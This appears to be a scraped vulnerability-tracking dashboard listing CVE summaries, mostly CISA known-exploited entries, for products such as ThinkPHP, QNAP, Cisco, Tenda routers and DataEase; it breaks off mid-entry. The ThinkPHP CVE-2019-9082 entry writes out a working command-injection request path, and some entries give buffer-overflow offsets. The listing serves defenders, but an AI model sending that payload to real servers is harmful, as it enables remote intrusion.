156
CVEs
48
Threats
0
News
73
Critical
73
CISA KEV
🛡 Security Vulnerabilities (CVE)
Apache ActiveMQ — CVE-2026-34197
Apache ActiveMQ contains an improper input validation vulnerability that allows for code injection.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the pro…
CVE-2019-2616
Oracle BI Publisher Unauthorized Access Vulnerability — Oracle BI Publisher, formerly XML Publisher, contains an unspeci
11:01 KSA
Oracle BI Publisher Unauthorized Access Vulnerability — Oracle BI Publisher, formerly XML Publisher, contains an unspecified vulnerability that allows for various unauthorized actions. Open-source reporting attributes this vulnerability to allowing for authentication bypass.
CVE-2019-5825
Google Chromium V8 Out-of-Bounds Write Vulnerability — Google Chromium V8 Engine contains an out-of-bounds write vulnera
11:01 KSA
Google Chromium V8 Out-of-Bounds Write Vulnerability — Google Chromium V8 Engine contains an out-of-bounds write vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that …
CVE-2019-6223
Apple iOS and macOS Group Facetime Vulnerability — Apple iOS and macOS Group FaceTime contains an unspecified vulnerabil
11:01 KSA
Apple iOS and macOS Group Facetime Vulnerability — Apple iOS and macOS Group FaceTime contains an unspecified vulnerability where the call initiator can cause the recipient's Apple device to answer unknowingly or without user interaction.
CVE-2019-6340
Drupal Core Remote Code Execution Vulnerability — In Drupal Core, some field types do not properly sanitize data from no
11:01 KSA
Drupal Core Remote Code Execution Vulnerability — In Drupal Core, some field types do not properly sanitize data from non-form sources. This can lead to arbitrary PHP code execution in some cases.
CVE-2019-6693
Fortinet FortiOS Use of Hard-Coded Credentials Vulnerability — Fortinet FortiOS contains a use of hard-coded credentials
11:01 KSA
Fortinet FortiOS Use of Hard-Coded Credentials Vulnerability — Fortinet FortiOS contains a use of hard-coded credentials vulnerability that could allow an attacker to cipher sensitive data in FortiOS configuration backup file via knowledge of the hard-coded key.
CVE-2019-7192
QNAP Photo Station Improper Access Control Vulnerability — QNAP NAS devices running Photo Station contain an improper ac
11:01 KSA
QNAP Photo Station Improper Access Control Vulnerability — QNAP NAS devices running Photo Station contain an improper access control vulnerability allowing remote attackers to gain unauthorized access to the system.
CVE-2019-7193
QNAP QTS Improper Input Validation Vulnerability — QNAP QTS contains an improper input validation vulnerability allowing
11:01 KSA
QNAP QTS Improper Input Validation Vulnerability — QNAP QTS contains an improper input validation vulnerability allowing remote attackers to inject code on the system.
CVE-2019-7194
QNAP Photo Station Path Traversal Vulnerability — QNAP devices running Photo Station contain an external control of file
11:01 KSA
QNAP Photo Station Path Traversal Vulnerability — QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.
CVE-2019-7195
QNAP Photo Station Path Traversal Vulnerability — QNAP devices running Photo Station contain an external control of file
11:01 KSA
QNAP Photo Station Path Traversal Vulnerability — QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.
CVE-2019-7238
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability — Sonatype Nexus Repository Manager before 3.15
11:01 KSA
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability — Sonatype Nexus Repository Manager before 3.15.0 has an incorrect access control vulnerability. Exploitation allows for remote code execution.
CVE-2019-7256
Nice Linear eMerge E3-Series OS Command Injection Vulnerability — Nice Linear eMerge E3-Series contains an OS command in
11:01 KSA
Nice Linear eMerge E3-Series OS Command Injection Vulnerability — Nice Linear eMerge E3-Series contains an OS command injection vulnerability that allows an attacker to conduct remote code execution.
CVE-2019-7287
Apple iOS Memory Corruption Vulnerability — Apple iOS contains a memory corruption vulnerability which could allow an at
11:01 KSA
Apple iOS Memory Corruption Vulnerability — Apple iOS contains a memory corruption vulnerability which could allow an attacker to perform remote code execution.
CVE-2019-7481
SonicWall SMA100 SQL Injection Vulnerability — SonicWall SMA100 contains a SQL injection vulnerability allowing an unaut
11:01 KSA
SonicWall SMA100 SQL Injection Vulnerability — SonicWall SMA100 contains a SQL injection vulnerability allowing an unauthenticated user to gain read-only access to unauthorized resources.
CVE-2019-7483
SonicWall SMA100 Directory Traversal Vulnerability — In SonicWall SMA100, an unauthenticated Directory Traversal vulnera
11:01 KSA
SonicWall SMA100 Directory Traversal Vulnerability — In SonicWall SMA100, an unauthenticated Directory Traversal vulnerability in the handleWAFRedirect CGI allows the user to test for the presence of a file on the server.
CVE-2019-7609
Kibana Arbitrary Code Execution — Kibana contain an arbitrary code execution flaw in the Timelion visualizer.
11:01 KSA
Kibana Arbitrary Code Execution — Kibana contain an arbitrary code execution flaw in the Timelion visualizer.
CVE-2019-8394
Zoho ManageEngine ServiceDesk Plus (SDP) File Upload Vulnerability — Zoho ManageEngine ServiceDesk Plus (SDP) contains a
11:01 KSA
Zoho ManageEngine ServiceDesk Plus (SDP) File Upload Vulnerability — Zoho ManageEngine ServiceDesk Plus (SDP) contains an unspecified vulnerability that allows remote users to upload files via login page customization.
CVE-2019-8506
Apple Multiple Products Type Confusion Vulnerability — A type confusion issue affecting multiple Apple products allows p
11:01 KSA
Apple Multiple Products Type Confusion Vulnerability — A type confusion issue affecting multiple Apple products allows processing of maliciously crafted web content, leading to arbitrary code execution.
CVE-2019-8526
Apple macOS Use-After-Free Vulnerability — Apple macOS contains a use-after-free vulnerability that could allow for priv
11:01 KSA
Apple macOS Use-After-Free Vulnerability — Apple macOS contains a use-after-free vulnerability that could allow for privilege escalation.
CVE-2019-8605
Apple Multiple Products Use-After-Free Vulnerability — A use-after-free vulnerability in Apple iOS, macOS, tvOS, and wat
11:01 KSA
Apple Multiple Products Use-After-Free Vulnerability — A use-after-free vulnerability in Apple iOS, macOS, tvOS, and watchOS could allow a malicious application to execute code with system privileges.
CVE-2019-8720
WebKitGTK Memory Corruption Vulnerability — WebKitGTK contains a memory corruption vulnerability which can allow an atta
11:01 KSA
WebKitGTK Memory Corruption Vulnerability — WebKitGTK contains a memory corruption vulnerability which can allow an attacker to perform remote code execution.
CVE-2019-9082
ThinkPHP Remote Code Execution Vulnerability — ThinkPHP contains an unspecified vulnerability that allows for remote cod
11:01 KSA
ThinkPHP Remote Code Execution Vulnerability — ThinkPHP contains an unspecified vulnerability that allows for remote code execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.
CVE-2019-9621
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability — Synacor Zimbra Collaboration
11:01 KSA
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability — Synacor Zimbra Collaboration Suite (ZCS) contains a server-side request forgery (SSRF) vulnerability via the ProxyServlet component.
CVE-2019-9670
Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference — Synacor Zimbra Collabor
11:01 KSA
Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference — Synacor Zimbra Collaboration Suite (ZCS) contains an improper restriction of XML external entity (XXE) vulnerability in the mailboxd component.
CVE-2023-38831
RARLAB WinRAR Code Execution Vulnerability — RARLAB WinRAR contains an unspecified vulnerability that allows an attacker
11:01 KSA
RARLAB WinRAR Code Execution Vulnerability — RARLAB WinRAR contains an unspecified vulnerability that allows an attacker to execute code when a user attempts to view a benign file within a ZIP archive.
CVE-2023-40044
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability — Progress WS_FTP Server contains a deserializati
11:01 KSA
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability — Progress WS_FTP Server contains a deserialization of untrusted data vulnerability in the Ad Hoc Transfer module that allows an authenticated attacker to execute remote commands on the underlying operating sy…
CVE-2023-41061
Apple iOS, iPadOS, and watchOS Wallet Code Execution Vulnerability — Apple iOS, iPadOS, and watchOS contain an unspecifi
11:01 KSA
Apple iOS, iPadOS, and watchOS Wallet Code Execution Vulnerability — Apple iOS, iPadOS, and watchOS contain an unspecified vulnerability due to a validation issue affecting Wallet in which a maliciously crafted attachment may result in code execution. This vulnerability was chain…
CVE-2023-41064
Apple iOS, iPadOS, and macOS ImageIO Buffer Overflow Vulnerability — Apple iOS, iPadOS, and macOS contain a buffer overf
11:01 KSA
Apple iOS, iPadOS, and macOS ImageIO Buffer Overflow Vulnerability — Apple iOS, iPadOS, and macOS contain a buffer overflow vulnerability in ImageIO when processing a maliciously crafted image, which may lead to code execution. This vulnerability was chained with CVE-2023-41061.
CVE-2023-41179
Trend Micro Apex One and Worry-Free Business Security Remote Code Execution Vulnerability — Trend Micro Apex One and Wor
11:01 KSA
Trend Micro Apex One and Worry-Free Business Security Remote Code Execution Vulnerability — Trend Micro Apex One and Worry-Free Business Security contain an unspecified vulnerability in the third-party anti-virus uninstaller that could allow an attacker to manipulate the module t…
CVE-2023-41990
Apple Multiple Products Code Execution Vulnerability — Apple iOS, iPadOS, macOS, tvOS, and watchOS contain an unspecifie
11:01 KSA
Apple Multiple Products Code Execution Vulnerability — Apple iOS, iPadOS, macOS, tvOS, and watchOS contain an unspecified vulnerability that allows for code execution when processing a font file.
CVE-2023-41991
Apple Multiple Products Improper Certificate Validation Vulnerability — Apple iOS, iPadOS, macOS, and watchOS contain an
11:01 KSA
Apple Multiple Products Improper Certificate Validation Vulnerability — Apple iOS, iPadOS, macOS, and watchOS contain an improper certificate validation vulnerability that can allow a malicious app to bypass signature validation.
Broadcom Brocade Fabric OS Code Injection Vulnerability — Broadcom Brocade Fabric OS contains a code injection vulnerability that allows a local user with administrative privileges to execute arbitrary code with full root privileges.
Cisco Identity Services Engine Injection Vulnerability — Cisco Identity Services Engine contains an injection vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC due to insufficient validation of user-supplied input allowing an attacker to exploit this vulnerability by…
Cisco Secure Firewall Adaptive Security Appliance (ASA) and Secure Firewall Threat Defense (FTD) Buffer Overflow Vulnerability — Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Software VPN Web Server contain a buffer overflow vuln…
Cisco Identity Services Engine Injection Vulnerability — Cisco Identity Services Engine contains an injection vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC due to insufficient validation of user-supplied input allowing an attacker to exploit this vulnerability by…
Cisco IOS and IOS XE Software SNMP Denial of Service and Remote Code Execution Vulnerability — Cisco IOS and IOS XE contains a stack-based buffer overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow for denial of service or remote cod…
Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Missing Authorization Vulnerability — Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Software VPN Web Server contain a missing author…
Cisco Multiple Products Improper Input Validation Vulnerability — Cisco Secure Email Gateway, Secure Email, AsyncOS Software, and Web Manager appliances contains an improper input validation vulnerability that allows threat actors to execute arbitrary commands with root privilege…
Samsung Mobile Devices Out-of-Bounds Write Vulnerability — Samsung mobile devices contain an out-of-bounds write vulnerability in libimagecodec.quram.so. This vulnerability could allow remote attackers to execute arbitrary code.
CVE-2025-21479
Qualcomm Chipsets GPU Micronode Unauthorized Command Execution Vulnerability
11:01 KSA
Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability — Multiple Qualcomm chipsets contain an incorrect authorization vulnerability. This vulnerability allows for memory corruption due to unauthorized command execution in GPU micronode while executing specific sequence…
Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability — Multiple Qualcomm chipsets contain an incorrect authorization vulnerability. This vulnerability allows for memory corruption due to unauthorized command execution in GPU micronode while executing specific sequence…
Juniper Junos OS Improper Isolation or Compartmentalization Vulnerability — Juniper Junos OS contains an improper isolation or compartmentalization vulnerability. This vulnerability could allows a local attacker with high privileges to inject arbitrary code.
VMware ESXi and Workstation TOCTOU Race Condition Vulnerability — VMware ESXi and Workstation contain a time-of-check time-of-use (TOCTOU) race condition vulnerability that leads to an out-of-bounds write. Successful exploitation enables an attacker with local administrative priv…
VMware ESXi Arbitrary Write Vulnerability — VMware ESXi contains an arbitrary write vulnerability. Successful exploitation allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.
VMware ESXi, Workstation, and Fusion Information Disclosure Vulnerability — VMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability due to an out-of-bounds read in HGFS. Successful exploitation allows an attacker with administrative privileges to a vi…
Smartbedded Meteobridge Command Injection Vulnerability — Smartbedded Meteobridge contains a command injection vulnerability that could allow remote unauthenticated attackers to gain arbitrary command execution with elevated privileges (root) on affected devices.
CVE-2025-40551
SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Deserialization
11:01 KSA
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability — SolarWinds Web Help Desk contains a deserialization of untrusted data vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could b…
SonicWall SMA1000 Missing Authorization Vulnerability — SonicWall SMA1000 contains a missing authorization vulnerability that could allow for privilege escalation appliance management console (AMC) of affected devices.
Broadcom VMware Aria Operations and VMware Tools Privilege Defined with Unsafe Actions Vulnerability — Broadcom VMware Aria Operations and VMware Tools contain a privilege defined with unsafe actions vulnerability. A malicious local actor with non-administrative privileges having…
Qualitia Active! Mail Stack-Based Buffer Overflow Vulnerability — Qualitia Active! Mail contains a stack-based buffer overflow vulnerability that allows a remote, unauthenticated attacker to execute arbitrary or trigger a denial-of-service via a specially crafted request.
SAP NetWeaver Deserialization Vulnerability — SAP NetWeaver Visual Composer Metadata Uploader contains a deserialization vulnerability that allows a privileged attacker to compromise the confidentiality, integrity, and availability of the host system by deserializing untrusted or…
CVE-2025-43200
Apple iOS/iPadOS/macOS/watchOS/visionOS iCloud Link Media Processing Vulnerability
11:01 KSA
Apple Multiple Products Unspecified Vulnerability — Apple iOS, iPadOS, macOS, watchOS, and visionOS, contain an unspecified vulnerability when processing a maliciously crafted photo or video shared via an iCloud Link.
Apple iOS, iPadOS, and macOS Out-of-Bounds Write Vulnerability — Apple iOS, iPadOS, and macOS contain an out-of-bounds write vulnerability in the Image I/O framework.
Apple Multiple Products Use-After-Free WebKit Vulnerability — Apple iOS, iPadOS, macOS, and other Apple products contain a use-after-free vulnerability in WebKit. Processing maliciously crafted web content may lead to memory corruption. This vulnerability could impact HTML parser…
Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability — Ivanti Endpoint Manager Mobile (EPMM) contains an authentication bypass vulnerability in the API component that allows an attacker to access protected resources without proper credentials via crafted API …
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability — Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability in the API component that allows an authenticated attacker to remotely execute arbitrary code via crafted API requests. This vulnerab…
Sitecore Multiple Products Deserialization of Untrusted Data Vulnerability — Sitecore Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and Managed Cloud contain a deserialization of untrusted data vulnerability involving the use of default machine keys…
Microsoft SharePoint Deserialization of Untrusted Data Vulnerability — Microsoft SharePoint Server on-premises contains a deserialization of untrusted data vulnerability that could allow an unauthorized attacker to execute code over a network. This vulnerability could be chained …
CVE-2025-5777
Citrix NetScaler ADC/Gateway Out-of-Bounds Read Vulnerability (CVE-2025-5777)
11:01 KSA
Citrix NetScaler ADC and Gateway Out-of-Bounds Read Vulnerability — Citrix NetScaler ADC and Gateway contain an out-of-bounds read vulnerability due to insufficient input validation. This vulnerability can lead to memory overread when the NetScaler is configured as a Gateway (VPN…
Sangoma FreePBX Authentication Bypass Vulnerability — Sangoma FreePBX contains an authentication bypass vulnerability due to insufficiently sanitized user-supplied data allows unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote co…
Fortinet FortiWeb OS Command Injection Vulnerability — Fortinet FortiWeb contains an OS command Injection vulnerability that may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands.
Dassault Systèmes DELMIA Apriso Code Injection Vulnerability — Dassault Systèmes DELMIA Apriso contains a code injection vulnerability that could allow an attacker to execute arbitrary code.
Dassault Systèmes DELMIA Apriso Missing Authorization Vulnerability — Dassault Systèmes DELMIA Apriso contains a missing authorization vulnerability that could allow an attacker to gain privileged access to the application.
RARLAB WinRAR Path Traversal Vulnerability — RARLAB WinRAR contains a path traversal vulnerability allowing an attacker to execute code in the context of the current user.
Microsoft Windows Race Condition Vulnerability — Microsoft Windows Kernel contains a race condition vulnerability that allows a local attacker with low-level privileges to escalate privileges. Successful exploitation of this vulnerability could enable the attacker to gain SYSTEM-…
Microsoft Windows Use After Free Vulnerability — Microsoft Windows Cloud Files Mini Filter Driver contains a use after free vulnerability that can allow an authorized attacker to elevate privileges locally.
Sangoma FreePBX OS Command Injection Vulnerability — Sangoma FreePBX Endpoint Manager contains an OS command injection vulnerability that could allow for a post-authentication command injection by an authenticated known user via the testconnection -> check_ssh_connect() function.…
Citrix NetScaler ADC and Gateway Buffer Overflow Vulnerability — Citrix NetScaler ADC and Gateway contain a buffer overflow vulnerability leading to unintended control flow and Denial of Service. NetScaler must be configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Pr…
Google Chromium V8 Type Confusion Vulnerability — Google Chromium V8 contains a type confusion vulnerability that could allow a remote attacker to perform arbitrary read/write via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, in…
Google Chromium ANGLE and GPU Improper Input Validation Vulnerability — Google Chromium contains an improper input validation vulnerability in ANGLE and GPU. This vulnerability could allow a remote attacker to potentially perform a sandbox escape via a crafted HTML page. This vul…
CVE-2025-66644
Array Networks ArrayOS AG OS Command Injection Vulnerability (CVE-2025-66644)
11:01 KSA
Array Networks ArrayOS AG OS Command Injection Vulnerability — Array Networks ArrayOS AG contains an OS command injection vulnerability that could allow an attacker to execute arbitrary commands.
RARLAB WinRAR Path Traversal Vulnerability — RARLAB WinRAR contains a path traversal vulnerability affecting the Windows version of WinRAR. This vulnerability could allow an attacker to execute arbitrary code by crafting malicious archive files.
N-able N-Central Insecure Deserialization Vulnerability — N-able N-Central contains an insecure deserialization vulnerability that could lead to command execution.
CVE-2023-3634
In products of the MSE6 product-family by Festo a remote authenticated, low privileged attacker could use functions of u
20:00 KSA
In products of the MSE6 product-family by Festo a remote authenticated, low privileged attacker could use functions of undocumented test mode which could lead to a complete loss of confidentiality, integrity and availability.
CVE-2025-14868
The Career Section plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Path Traversal and Arbitr
00:16 KSA
The Career Section plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Path Traversal and Arbitrary File Deletion in all versions up to, and including, 1.6. This is due to missing nonce validation and insufficient file path validation on the delete action …
CVE-2026-1620
The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and
00:16 KSA
The Livemesh Addons for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 9.0. This is due to insufficient sanitization of the template name parameter in the `lae_get_template_part()` function, which uses an inadequate `str…
CVE-2026-33083
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection
02:16 KSA
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the orderDirection parameter used in dataset-related endpoints including /de2api/datasetData/enumValueDs and /de2api/datasetTree/exportDataset…
CVE-2026-33084
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection
02:16 KSA
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the sort parameter of the /de2api/datasetData/enumValueObj endpoint. The DatasetDataManage service layer directly transfers the user-supplied …
CVE-2026-33121
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection
06:18 KSA
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the API datasource saving process. The deTableName field from the Base64-encoded datasource configuration is used to construct a DDL statement…
CVE-2026-33207
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection
06:18 KSA
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the /datasource/getTableField endpoint. The getTableFiledSql method in CalciteProvider.java incorporates the tableName parameter directly into…
CVE-2026-3614
The AcyMailing plugin for WordPress is vulnerable to privilege escalation in all versions From 9.11.0 up to, and includi
00:16 KSA
The AcyMailing plugin for WordPress is vulnerable to privilege escalation in all versions From 9.11.0 up to, and including, 10.8.1 due to a missing capability check on the `wp_ajax_acymailing_router` AJAX handler. This makes it possible for authenticated attackers, with Subscribe…
CVE-2026-40502
OpenHarness prior to commit dd1d235 contains a command injection vulnerability that allows remote gateway users with cha
20:00 KSA
OpenHarness prior to commit dd1d235 contains a command injection vulnerability that allows remote gateway users with chat access to invoke sensitive administrative commands by exploiting insufficient distinction between local-only and remote-safe commands in the gateway handler. …
CVE-2026-40900
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection
06:18 KSA
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the /de2api/datasetData/previewSql endpoint. The user-supplied SQL is wrapped in a subquery without validation that the input is a single SELE…
CVE-2026-40901
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below ship the legacy velocit
06:18 KSA
DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below ship the legacy velocity-1.7.jar, which pulls in commons-collections-3.2.1.jar containing the InvokerTransformer deserialization gadget chain. Quartz 2.3.2, also bundled in the applic…
CVE-2026-6121
A flaw has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function WrlclientSet of the file /go
05:16 KSA
A flaw has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function WrlclientSet of the file /goform/WrlclientSet of the component httpd. This manipulation of the argument GO causes stack-based buffer overflow. The attack may be initiated remotely. The exp…
CVE-2026-6122
A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this issue is the function frmL7ProtForm of the file /
05:16 KSA
A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this issue is the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The expl…
CVE-2026-6123
A vulnerability was found in Tenda F451 1.0.0.7. This affects the function fromAddressNat of the file /goform/addressNat
05:16 KSA
A vulnerability was found in Tenda F451 1.0.0.7. This affects the function fromAddressNat of the file /goform/addressNat of the component httpd. Performing a manipulation of the argument entrys results in stack-based buffer overflow. Remote exploitation of the attack is possible.…
CVE-2026-6124
A vulnerability was determined in Tenda F451 1.0.0.7. This vulnerability affects the function fromSafeMacFilter of the f
05:16 KSA
A vulnerability was determined in Tenda F451 1.0.0.7. This vulnerability affects the function fromSafeMacFilter of the file /goform/SafeMacFilter of the component httpd. Executing a manipulation of the argument page/menufacturer can lead to stack-based buffer overflow. The attack…
CVE-2026-6133
A vulnerability was identified in Tenda F451 1.0.0.7_cn_svn7958. This affects the function fromSafeUrlFilter of the file
15:16 KSA
A vulnerability was identified in Tenda F451 1.0.0.7_cn_svn7958. This affects the function fromSafeUrlFilter of the file /goform/SafeUrlFilter. Such manipulation of the argument page leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicl…
CVE-2026-6134
A security flaw has been discovered in Tenda F451 1.0.0.7_cn_svn7958. This vulnerability affects the function fromqosset
21:18 KSA
A security flaw has been discovered in Tenda F451 1.0.0.7_cn_svn7958. This vulnerability affects the function fromqossetting of the file /goform/qossetting. Performing a manipulation of the argument qos results in stack-based buffer overflow. The attack is possible to be carried …
CVE-2026-6135
A weakness has been identified in Tenda F451 1.0.0.7_cn_svn7958. This issue affects the function fromSetIpBind of the fi
21:18 KSA
A weakness has been identified in Tenda F451 1.0.0.7_cn_svn7958. This issue affects the function fromSetIpBind of the file /goform/SetIpBind. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack may be performed from remote. The exploi…
CVE-2026-6136
A security vulnerability has been detected in Tenda F451 1.0.0.7_cn_svn7958. Impacted is the function frmL7ImForm of the
21:18 KSA
A security vulnerability has been detected in Tenda F451 1.0.0.7_cn_svn7958. Impacted is the function frmL7ImForm of the file /goform/L7Im. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has …
CVE-2026-6137
A vulnerability was detected in Tenda F451 1.0.0.7_cn_svn7958. The affected element is the function fromAdvSetWan of the
21:18 KSA
A vulnerability was detected in Tenda F451 1.0.0.7_cn_svn7958. The affected element is the function fromAdvSetWan of the file /goform/AdvSetWan. The manipulation of the argument wanmode/PPPOEPassword results in stack-based buffer overflow. It is possible to launch the attack remo…
CVE-2026-6348
WinMatrix agent developed by Simopro Technology has a Missing Authentication vulnerability, allowing authenticated local
20:00 KSA
WinMatrix agent developed by Simopro Technology has a Missing Authentication vulnerability, allowing authenticated local attackers to execute arbitrary code with SYSTEM privileges on the local machine as well as on all hosts within the environment where the agent is installed.
CVE-2018-25258
RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass
05:16 KSA
RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger …
CVE-2019-25689
HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code
05:16 KSA
HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying an oversized key code string. Attackers can craft a malicious payload exceeding 997 bytes and paste it into the KEY CODE field in the Help Register…
CVE-2019-25691
Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attac
05:16 KSA
Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Re…
CVE-2019-25695
R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting mali
05:16 KSA
R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting malicious input into the GUI Preferences language field. Attackers can craft a payload with a 292-byte offset and JMP ESP instruction to execute commands like calc.…
CVE-2019-25701
Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that a
05:16 KSA
Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that allows local attackers to overwrite the structured exception handler. Attackers can input a crafted payload exceeding 996 bytes in the username field to trigger …
CVE-2019-25705
Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or e
09:00 KSA
Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized string in the Rules action field. Attackers can create a malicious text file with a crafted payload exceeding bu…
CVE-2019-25697
CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries
05:16 KSA
CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cat_id parameter. Attackers can send GET requests to category.php with malicious cat_id values to extract sensitive database …
CVE-2019-25710
Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint tha
09:00 KSA
Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database info…
CVE-2019-25706
Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom
09:00 KSA
Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom-0 backup file containing sensitive information by sending a simple GET request. Attackers can access the rom-0 endpoint without authentication to retrieve and …
CVE-2026-3489
The DirectoryPress – Business Directory And Classified Ad Listing plugin for WordPress is vulnerable to SQL Injection vi
02:16 KSA
The DirectoryPress – Business Directory And Classified Ad Listing plugin for WordPress is vulnerable to SQL Injection via the 'packages' parameter in versions up to, and including, 3.6.26 due to insufficient escaping on the user supplied parameter and lack of sufficient preparati…
CVE-2026-3599
The Riaxe Product Customizer plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter keys within
20:00 KSA
The Riaxe Product Customizer plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter keys within 'product_data' of the /wp-json/InkXEProductDesignerLite/add-item-to-cart REST API endpoint in all versions up to, and including, 2.1.2. This is due to insuffic…
CVE-2026-40073
SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, under
05:16 KSA
SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, under certain circumstances, requests could bypass the BODY_SIZE_LIMIT on SvelteKit applications running with adapter-node. This bypass does not affect body size lim…
CVE-2026-40074
SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, redir
05:16 KSA
SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, redirect, when called from inside the handle server hook with a location parameter containing characters that are invalid in a HTTP header, will cause an unhandled T…
CVE-2026-40246
free5GC is an open-source implementation of the 5G core network. In versions 1.4.2 and below of the UDR service, the han
20:43 KSA
free5GC is an open-source implementation of the 5G core network. In versions 1.4.2 and below of the UDR service, the handler for deleting Traffic Influence Subscriptions checks whether the influenceId path segment equals subs-to-notify, but does not return after sending the HTTP …
CVE-2026-40247
free5GC is an open-source implementation of the 5G core network. In versions 4.2.1 and below of the UDR service, the han
20:43 KSA
free5GC is an open-source implementation of the 5G core network. In versions 4.2.1 and below of the UDR service, the handler for reading Traffic Influence Subscriptions checks whether the influenceId path segment equals subs-to-notify, but does not return after sending the HTTP 4…
CVE-2026-5050
The Payment Gateway for Redsys & WooCommerce Lite plugin for WordPress is vulnerable to Improper Verification of Cryptog
